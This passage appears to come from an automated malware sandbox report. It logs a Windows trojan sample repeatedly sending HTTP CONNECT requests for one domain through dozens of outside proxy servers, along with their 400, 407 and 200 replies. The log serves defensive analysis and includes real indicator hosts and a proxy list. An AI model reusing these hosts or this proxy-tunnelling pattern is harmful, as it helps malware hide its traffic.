                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                297192.168.2.8510605.42.74.179364575828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.072712898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                298192.168.2.851087122.116.150.290005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.072916031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                299192.168.2.85047098.162.25.2341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.089725018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                300192.168.2.85043188.199.164.14080815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.089963913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.909157991 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                301192.168.2.850398188.132.221.16980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.093693972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194982052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.288971901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                302192.168.2.850491161.97.173.42539485828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.103199959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194907904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.288923025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.398144960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                303192.168.2.851113194.35.118.24331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.109066010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.616651058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352921009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.585796118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.992077112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491872072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.898252010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.753319979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:22.169137001 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                304192.168.2.851148104.21.194.19805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.124756098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.213046074 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                305192.168.2.851079120.37.121.20990915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.126030922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.495315075 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.1
                                                                                Date: Fri, 23 Feb 2024 13:28:36 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                306192.168.2.850299103.144.18.13720025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.130215883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194905043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                307192.168.2.851163203.30.188.247805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.151015997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.237993002 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                308192.168.2.85111543.153.133.208156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.171971083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                309192.168.2.851091139.99.148.9031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.172528028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.537292957 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                                Server: squid/3.5.20
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3640
                                                                                X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                310192.168.2.85058337.252.13.24831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.175795078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194926977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.288923025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.398144960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                311192.168.2.851017154.223.20.2131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.192702055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352807999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194958925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.527616978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.192281961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.855026960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                312192.168.2.851150184.178.172.5153035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.195913076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                313192.168.2.85113545.11.95.16550325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.197824955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                314192.168.2.851176104.17.171.235805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.198909044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.286958933 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                315192.168.2.85115382.113.157.122312805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.201530933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                316192.168.2.851179104.21.80.83805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.202636957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.290200949 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                317192.168.2.851177152.32.238.63380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.203435898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                318192.168.2.851140212.127.93.18580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.218163967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                319192.168.2.850354103.221.228.5056785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.218368053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.288592100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.382550955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.382644892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                320192.168.2.851143164.163.21.1482915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.224100113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                321192.168.2.851164184.181.217.22041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.225826979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                322192.168.2.85115195.43.244.1541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.243483067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                323192.168.2.85119892.204.134.38544675828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.246562958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                324192.168.2.85110527.65.30.3710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.251957893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                325192.168.2.851205104.24.220.52805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.252526045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.340079069 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                326192.168.2.850485103.160.75.174805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.254209995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.288620949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
